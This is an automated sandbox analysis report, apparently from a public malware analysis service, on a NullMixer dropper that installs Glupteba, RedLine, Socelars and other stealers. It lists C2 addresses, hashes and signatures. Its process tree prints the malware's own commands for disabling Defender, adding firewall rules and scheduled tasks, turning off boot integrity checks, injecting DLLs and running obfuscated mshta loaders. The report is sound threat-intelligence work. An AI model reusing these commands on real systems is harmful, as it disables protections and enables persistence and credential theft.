Overview

overview

10

Static

static

3

65502a1c71...7e.exe

windows7-x64

10

65502a1c71...7e.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23-12-2024 20:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    65502a1c719e5ad252a349d9f5b278a415a61f88e8c049d5ff8dc828da36ad7e.exe

  • Size

    10.6MB

  • MD5

    2d31d4fbad1650ec69c899a5417de3dd

  • SHA1

    621ba6e8907e372798440d711126f0b0a0d8ce2f

  • SHA256

    65502a1c719e5ad252a349d9f5b278a415a61f88e8c049d5ff8dc828da36ad7e

  • SHA512

    ac21c3aac43864449e0c135e9466bd368fe16131ba9bd54e754c22410d2b325f2cc525c33509c7fbab5d480d36833aa3bb08d470dec37444fbad5383e362c361

  • SSDEEP

    196608:xYLUCgA7XFU7WhMld/UnPejgM4YdJUB7vLzaDBuCUfvpQJfB/0Do05kWgX0q:x0dgkXFU7zCnPUgM4WUkBqRQ/BTkq

Score
10/10
fabookiegluptebametasploitnullmixerprivateloaderredlinesocelarsmedia23nuser01newaspackv2backdoordiscoverydropperevasionexecutioninfostealerloaderpersistenceprivilege_escalationrootkitspywarestealertrojan

Malware Config

Extracted

Family

socelars

C2

http://www.ecgbg.com/

Extracted

Family

redline

Botnet

media23n

C2

65.108.69.168:16278

Attributes
  • auth_value

    187686d42fe6990103297406a32ce4af

Extracted

Family

redline

Botnet

user01new

C2

49.12.219.50:4846

Attributes
  • auth_value

    fcca1ed5af8553053dc74a4c6a9ce601

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Detect Fabookie payload 1 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

    spywarestealerfabookie
  • Fabookie family
    fabookie
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba family
    glupteba
  • Glupteba payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Metasploit family
    metasploit
  • NullMixer

    NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.

    droppernullmixer
  • Nullmixer family
    nullmixer
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

    loaderprivateloader
  • Privateloader family
    privateloader
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 10 IoCs
  • Redline family
    redline
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars family
    socelars
  • Socelars payload 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
    evasiontrojan
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

    evasion
  • ASPack v2.12-2.42 3 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Executes dropped EXE 33 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 10 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

    rootkitevasion
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

    rootkitevasion
  • Suspicious use of SetThreadContext 2 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
    evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 60 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\65502a1c719e5ad252a349d9f5b278a415a61f88e8c049d5ff8dc828da36ad7e.exe
    "C:\Users\Admin\AppData\Local\Temp\65502a1c719e5ad252a349d9f5b278a415a61f88e8c049d5ff8dc828da36ad7e.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:316
    • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2752
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2716
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2896
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1704
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1928
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Tue20acc89cbd449e95d.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:3020
        • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20acc89cbd449e95d.exe
          Tue20acc89cbd449e95d.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:2144
          • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20acc89cbd449e95d.exe
            C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20acc89cbd449e95d.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2744
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Tue20cb62eb1a4cb3a01.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2164
        • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20cb62eb1a4cb3a01.exe
          Tue20cb62eb1a4cb3a01.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:408
          • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20cb62eb1a4cb3a01.exe
            "C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20cb62eb1a4cb3a01.exe"
            5⤵
            • Windows security bypass
            • Executes dropped EXE
            • Windows security modification
            • Adds Run key to start application
            • Checks for VirtualBox DLLs, possible anti-VM trick
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:1564
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              6⤵
                PID:2884
                • C:\Windows\system32\netsh.exe
                  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                  7⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  • Modifies data under HKEY_USERS
                  PID:2644
              • C:\Windows\rss\csrss.exe
                C:\Windows\rss\csrss.exe /306-306
                6⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Manipulates WinMon driver.
                • Manipulates WinMonFS driver.
                • System Location Discovery: System Language Discovery
                • Modifies data under HKEY_USERS
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                PID:1576
                • C:\Windows\system32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:1196
                • C:\Windows\system32\schtasks.exe
                  schtasks /delete /tn ScheduledUpdate /f
                  7⤵
                    PID:2532
                  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                    "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                    7⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    PID:832
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1540
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1156
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:668
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2944
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2688
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2052
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1428
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:388
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:3048
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1656
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2144
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -timeout 0
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1648
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:540
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\Sysnative\bcdedit.exe /v
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2188
                  • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    7⤵
                    • Executes dropped EXE
                    PID:2164
                  • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1704
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue2032d2e78e3d4a56.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2472
            • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2032d2e78e3d4a56.exe
              Tue2032d2e78e3d4a56.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1644
              • C:\Users\Admin\AppData\Local\Temp\is-D03EQ.tmp\Tue2032d2e78e3d4a56.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-D03EQ.tmp\Tue2032d2e78e3d4a56.tmp" /SL5="$8019C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2032d2e78e3d4a56.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:320
                • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2032d2e78e3d4a56.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2032d2e78e3d4a56.exe" /SILENT
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:2328
                  • C:\Users\Admin\AppData\Local\Temp\is-6CLTF.tmp\Tue2032d2e78e3d4a56.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-6CLTF.tmp\Tue2032d2e78e3d4a56.tmp" /SL5="$601D8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2032d2e78e3d4a56.exe" /SILENT
                    7⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: GetForegroundWindowSpam
                    PID:2036
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue202def121e32deb35.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2824
            • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue202def121e32deb35.exe
              Tue202def121e32deb35.exe
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1540
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 272
                5⤵
                • Program crash
                PID:348
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue20177cabec2a.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:3036
            • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20177cabec2a.exe
              Tue20177cabec2a.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2656
              • C:\Users\Admin\AppData\Local\Temp\is-C47EJ.tmp\Tue20177cabec2a.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-C47EJ.tmp\Tue20177cabec2a.tmp" /SL5="$80190,140047,56320,C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20177cabec2a.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2556
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue205ff5cb98.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:592
            • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue205ff5cb98.exe
              Tue205ff5cb98.exe
              4⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:2772
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue2069ccb821.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:984
            • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2069ccb821.exe
              Tue2069ccb821.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1744
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue207aa8a73892eeac.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2080
            • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue207aa8a73892eeac.exe
              Tue207aa8a73892eeac.exe
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:768
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                5⤵
                • System Location Discovery: System Language Discovery
                PID:908
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im chrome.exe
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2320
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue2089e53e7fc7158da.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1848
            • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2089e53e7fc7158da.exe
              Tue2089e53e7fc7158da.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:1156
              • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2089e53e7fc7158da.exe
                C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2089e53e7fc7158da.exe
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2724
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue2042f82e3d3979159.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:544
            • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2042f82e3d3979159.exe
              Tue2042f82e3d3979159.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2964
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\System32\mshta.exe" VbscRIpt: CloSE ( crEatEoBjECt( "WScrIPT.ShElL" ). RuN ( "C:\Windows\system32\cmd.exe /q /r Type ""C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2042f82e3d3979159.exe"" > DMBV.exe && StarT DMBV.EXE /pHimz7Zg2S6 & IF """" == """" for %G IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2042f82e3d3979159.exe"" ) do taskkill /f -im ""%~nxG""" , 0 , TRuE ) )
                5⤵
                • System Location Discovery: System Language Discovery
                PID:604
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /q /r Type "C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2042f82e3d3979159.exe" > DMBV.exe && StarT DMBV.EXE /pHimz7Zg2S6 & IF "" =="" for %G IN ("C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2042f82e3d3979159.exe" ) do taskkill /f -im "%~nxG"
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2128
                  • C:\Users\Admin\AppData\Local\Temp\DMBV.exe
                    DMBV.EXE /pHimz7Zg2S6
                    7⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:2796
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\System32\mshta.exe" VbscRIpt: CloSE ( crEatEoBjECt( "WScrIPT.ShElL" ). RuN ( "C:\Windows\system32\cmd.exe /q /r Type ""C:\Users\Admin\AppData\Local\Temp\DMBV.exe"" > DMBV.exe && StarT DMBV.EXE /pHimz7Zg2S6 & IF ""/pHimz7Zg2S6 "" == """" for %G IN ( ""C:\Users\Admin\AppData\Local\Temp\DMBV.exe"" ) do taskkill /f -im ""%~nxG""" , 0 , TRuE ) )
                      8⤵
                      • System Location Discovery: System Language Discovery
                      • Modifies Internet Explorer settings
                      PID:2720
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /q /r Type "C:\Users\Admin\AppData\Local\Temp\DMBV.exe" > DMBV.exe && StarT DMBV.EXE /pHimz7Zg2S6 & IF "/pHimz7Zg2S6 " =="" for %G IN ("C:\Users\Admin\AppData\Local\Temp\DMBV.exe" ) do taskkill /f -im "%~nxG"
                        9⤵
                        • System Location Discovery: System Language Discovery
                        PID:2620
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\System32\mshta.exe" VBScRIPt: clOsE( cREATEObjEcT ( "wsCrIPT.SheLl"). rUN ( "C:\Windows\system32\cmd.exe /C EchO | sET /p = ""MZ"" > DGPfT4.kzH & COPY /Y /b DGPFT4.KzH+ 1_iQ.s + PBUQ78r.P + z27eOnF.4+ RMuPFPR.G ATVQG.K& STArT control .\aTVQG.K ", 0 , TrUE ) )
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:2652
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /C EchO | sET /p = "MZ" > DGPfT4.kzH & COPY /Y /b DGPFT4.KzH+ 1_iQ.s + PBUQ78r.P + z27eOnF.4+ RMuPFPR.G ATVQG.K& STArT control .\aTVQG.K
                        9⤵
                        • System Location Discovery: System Language Discovery
                        PID:1236
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" EchO "
                          10⤵
                          • System Location Discovery: System Language Discovery
                          PID:2612
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>DGPfT4.kzH"
                          10⤵
                          • System Location Discovery: System Language Discovery
                          PID:2600
                        • C:\Windows\SysWOW64\control.exe
                          control .\aTVQG.K
                          10⤵
                          • System Location Discovery: System Language Discovery
                          PID:2360
                          • C:\Windows\SysWOW64\rundll32.exe
                            "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\aTVQG.K
                            11⤵
                            • System Location Discovery: System Language Discovery
                            PID:1644
                            • C:\Windows\system32\RunDll32.exe
                              C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\aTVQG.K
                              12⤵
                                PID:1708
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\aTVQG.K
                                  13⤵
                                  • Blocklisted process makes network request
                                  • System Location Discovery: System Language Discovery
                                  PID:1736
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f -im "Tue2042f82e3d3979159.exe"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2812
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue20c64a1a28623ee7.exe
              3⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1412
              • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20c64a1a28623ee7.exe
                Tue20c64a1a28623ee7.exe
                4⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:1916
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue2025487c6c276c3.exe
              3⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1920
              • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2025487c6c276c3.exe
                Tue2025487c6c276c3.exe
                4⤵
                • Executes dropped EXE
                PID:2580
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue20c0a313caa25872.exe
              3⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2844
              • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20c0a313caa25872.exe
                Tue20c0a313caa25872.exe
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1952
                • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20c0a313caa25872.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20c0a313caa25872.exe" -u
                  5⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1608
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue2066325c078.exe
              3⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2696
              • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2066325c078.exe
                Tue2066325c078.exe
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2924
                • C:\Users\Admin\AppData\Local\Temp\is-VOKKE.tmp\Tue2066325c078.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-VOKKE.tmp\Tue2066325c078.tmp" /SL5="$601FC,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2066325c078.exe"
                  5⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  PID:3048
                  • C:\Program Files (x86)\Gparted\Build.sfx.exe
                    "C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1
                    6⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    • System Location Discovery: System Language Discovery
                    PID:656
                    • C:\Program Files (x86)\Gparted\Build.exe
                      "C:\Program Files (x86)\Gparted\Build.exe"
                      7⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2840
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
                        8⤵
                        • Drops file in Program Files directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2144
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com
                        8⤵
                        • Drops file in Program Files directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2604
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com
                        8⤵
                        • Drops file in Program Files directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1720
